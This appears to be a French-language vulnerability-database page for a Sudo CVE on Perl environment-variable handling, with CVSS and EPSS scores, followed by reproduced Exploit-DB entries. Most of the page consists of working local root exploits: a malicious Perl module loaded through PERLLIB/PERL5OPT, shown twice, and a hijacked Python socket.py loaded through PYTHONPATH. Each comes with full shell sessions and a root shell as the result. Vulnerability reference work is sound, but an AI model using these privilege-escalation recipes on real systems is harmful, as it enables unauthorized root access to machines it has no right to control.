CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Sudo before 1.6.8 p12, when the Perl taint flag is off, does not clear the (1) PERLLIB, (2) PERL5LIB, and (3) PERL5OPT environment variables, which allows limited local users to cause a Perl script to include and execute arbitrary library files that have the same name as library files that are included by the script.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
4.6
AV:L/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
3.22%
–
–
2022-02-13
–
–
3.22%
–
–
2022-04-03
–
–
3.22%
–
–
2022-09-18
–
–
3.22%
–
–
2023-03-12
–
–
–
0.06%
–
2023-05-07
–
–
–
0.04%
–
2024-06-02
–
–
–
0.04%
–
2025-01-19
–
–
–
0.04%
–
2025-03-18
–
–
–
–
0.79%
2025-03-30
–
–
–
–
0.8%
2025-04-15
–
–
–
–
0.8%
2025-04-16
–
–
–
–
0.69%
2025-04-23
–
–
–
–
0.51%
2025-04-23
–
–
–
–
0.51,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2006-01-08 23h00 +00:00 Auteur : Breno Silva Pinto EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/16184/info
Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.
A local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.
An attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.
This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability).
## Sudo local root exploit ##
## vuln versions : sudo < 1.6.8p12
## adv : https://www.securityfocus.com/bid/15394
## adv : http://www.frsirt.com/bulletins/2642
##by breno - breno@kalangolinux.org
## You need execute access to perl script in sudo ##
## cat /etc/sudoers ##
breno ALL=(ALL) /home/breno/code.pl
## Now let's create your own perl module FTP.pm :) good name.
breno ~ $ -> mkdir modules
breno ~ $ -> mkdir FTP
breno ~/modules $ -> ls
FTP
breno ~/modules $ -> cd FTP
breno ~/modules/FTP $ -> h2xs -AXc -n FTP
Defaulting to backwards compatibility with perl 5.8.7
If you intend this module to be compatible with earlier perl versions, please
specify a minimum perl version with the -b option.
Writing FTP/lib/FTP.pm
Writing FTP/Makefile.PL
Writing FTP/README
Writing FTP/t/FTP.t
Writing FTP/Changes
Writing FTP/MANIFEST
breno ~/modules/FTP $ ->
breno ~/modules/FTP/FTP $ -> perl Makefile.PL
Checking if your kit is complete...
Looks good
Writing Makefile for FTP
breno ~/modules/FTP/FTP $ -> make
cp lib/FTP.pm blib/lib/FTP.pm
Manifying blib/man3/FTP.3pm
breno ~/modules/FTP/FTP $ -> make test
PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" "test_harness(0,
'blib/lib', 'blib/arch')" t/*.t
t/FTP....ok
All tests successful.
Files=1, Tests=1, 0 wallclock secs ( 0.03 cusr + 0.01 csys = 0.04 CPU)
breno ~/modules/FTP/FTP $ ->
#Now i deleted the default FTP.pm (it was ugly), and create my beautiful module
breno ~/modules/FTP/FTP/blib/lib $ -> vi FTP.pm
package FTP;
use strict;
use vars qw($VERSION);
$VERSION = '0.01';
sub new {
my $package = shift;
return bless({}, $package);
}
sub verbose {
my $self = shift;
system("/bin/bash");
if (@_) {
$self->{'verbose'} = shift;
}
return $self->{'verbose'};
}
sub hoot {
my $self = shift;
return "Don't pollute!" if $self->{'verbose'};
return;
}
1;
__END__
EOF
# Remenber our super code.pl
breno ~ $ -> vi code.pl
#!/usr/bin/perl
BEGIN { $| = 1; print "1..1\n"; }
END {print "not ok 1\n" unless $loaded;}
use FTP;
$loaded = 1;
print "ok 1\n";
my $obj = new FTP;
$obj->verbose(1);
my $result = $obj->hoot;
print ($result eq "Don't pollute!" ? "ok 2\n" : "not ok 2\n");
$obj->verbose(0);
my $result = $obj->hoot;
print ($result eq "" ? "ok 3\n" : "not ok 3\n");
EOF
# Now let's play with PERLLIB and PERL5OPT env.
breno ~ $ -> export PERLLIB="/home/breno/modules/FTP/FTP/blib/lib/"
breno ~ $ -> export PERL5OPT="-MFTP"
# Now get Root!! :)
breno ~ $ -> sudo ./code.pl
Password:
1..1
ok 1
root ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root ~ # ->
Date de publication : 2006-01-08 23h00 +00:00 Auteur : Breno Silva Pinto EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/16184/info
Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.
A local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.
An attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.
This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability).
## Sudo local root escalation privilege ##
## vuln versions : sudo < 1.6.8p10
## adv : https://www.securityfocus.com/bid/16184
## by breno - breno at kalangolinux dot org
## You need sudo access execution for some python script ##
## First look sudoers file. User 'breno' can execute expl_python_sudo.py script
breno ~ $ -> cat /etc/sudoers
breno ALL=(ALL) /home/breno/expl_python_sudo.py
## Second, see our simple PoC python script
breno ~ $ -> cat /home/breno/expl_python_sudo.py
#!/usr/bin/python
import sys
import socket
import os
print "Python Sudo Exploit"
exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.close()
breno ~ $ ->
## Sexy !! Do nothing :)
## Ok. What you need to do to get root is hijacking socket.py module , change close()
function to execute something and
## change PYTHONPTAH env.
breno ~ $ -> cp /usr/lib/python2.3/socket.py /home/breno/
breno ~ $ -> vi /home/breno/socket.py
...
import os
...
def close(self):
os.execl("/bin/sh","/bin/ah");
self._sock = _closedsocket()
self.send = self.recv = self.sendto = self.recvfrom = self._sock._dummy
close.__doc__ = _realsocket.close.__doc__
...
## Ok .. save it and export env
breno ~ $ -> export PYTHONPATH=/home/breno
## .. and execute script. Too much sexy !!!
breno ~ $ -> sudo /home/breno/expl_python_sudo.py
Python Sudo Exploit
root ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root ~ # ->
Date de publication : 2005-11-10 23h00 +00:00 Auteur : Charles Morris EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/15394/info
Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling the 'PERLLIB', 'PERL5LIB', and 'PERL5OPT' environment variables when tainting is ignored.
An attacker can exploit this vulnerability to bypass security restrictions and include arbitrary library files.
To exploit this vulnerability, an attacker must be able to run Perl scripts through Sudo.
## Sudo local root exploit ##
## vuln versions : sudo < 1.6.8p12
## adv : https://www.securityfocus.com/bid/15394
## adv : http://www.frsirt.com/bulletins/2642
##by breno - breno@kalangolinux.org
## You need execute access to perl script in sudo ##
## cat /etc/sudoers ##
breno ALL=(ALL) /home/breno/code.pl
## Now let's create your own perl module FTP.pm :) good name.
breno ~ $ -> mkdir modules
breno ~ $ -> mkdir FTP
breno ~/modules $ -> ls
FTP
breno ~/modules $ -> cd FTP
breno ~/modules/FTP $ -> h2xs -AXc -n FTP
Defaulting to backwards compatibility with perl 5.8.7
If you intend this module to be compatible with earlier perl versions, please
specify a minimum perl version with the -b option.
Writing FTP/lib/FTP.pm
Writing FTP/Makefile.PL
Writing FTP/README
Writing FTP/t/FTP.t
Writing FTP/Changes
Writing FTP/MANIFEST
breno ~/modules/FTP $ ->
breno ~/modules/FTP/FTP $ -> perl Makefile.PL
Checking if your kit is complete...
Looks good
Writing Makefile for FTP
breno ~/modules/FTP/FTP $ -> make
cp lib/FTP.pm blib/lib/FTP.pm
Manifying blib/man3/FTP.3pm
breno ~/modules/FTP/FTP $ -> make test
PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" "test_harness(0,
'blib/lib', 'blib/arch')" t/*.t
t/FTP....ok
All tests successful.
Files=1, Tests=1, 0 wallclock secs ( 0.03 cusr + 0.01 csys = 0.04 CPU)
breno ~/modules/FTP/FTP $ ->
#Now i deleted the default FTP.pm (it was ugly), and create my beautiful module
breno ~/modules/FTP/FTP/blib/lib $ -> vi FTP.pm
package FTP;
use strict;
use vars qw($VERSION);
$VERSION = '0.01';
sub new {
my $package = shift;
return bless({}, $package);
}
sub verbose {
my $self = shift;
system("/bin/bash");
if (@_) {
$self->{'verbose'} = shift;
}
return $self->{'verbose'};
}
sub hoot {
my $self = shift;
return "Don't pollute!" if $self->{'verbose'};
return;
}
1;
__END__
EOF
# Remenber our super code.pl
breno ~ $ -> vi code.pl
#!/usr/bin/perl
BEGIN { $| = 1; print "1..1\n"; }
END {print "not ok 1\n" unless $loaded;}
use FTP;
$loaded = 1;
print "ok 1\n";
my $obj = new FTP;
$obj->verbose(1);
my $result = $obj->hoot;
print ($result eq "Don't pollute!" ? "ok 2\n" : "not ok 2\n");
$obj->verbose(0);
my $result = $obj->hoot;
print ($result eq "" ? "ok 3\n" : "not ok 3\n");
EOF
# Now let's play with PERLLIB and PERL5OPT env.
breno ~ $ -> export PERLLIB="/home/breno/modules/FTP/FTP/blib/lib/"
breno ~ $ -> export PERL5OPT="-MFTP"
# Now get Root!! :)
breno ~ $ -> sudo ./code.pl
Password:
1..1
ok 1
root ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root ~ # ->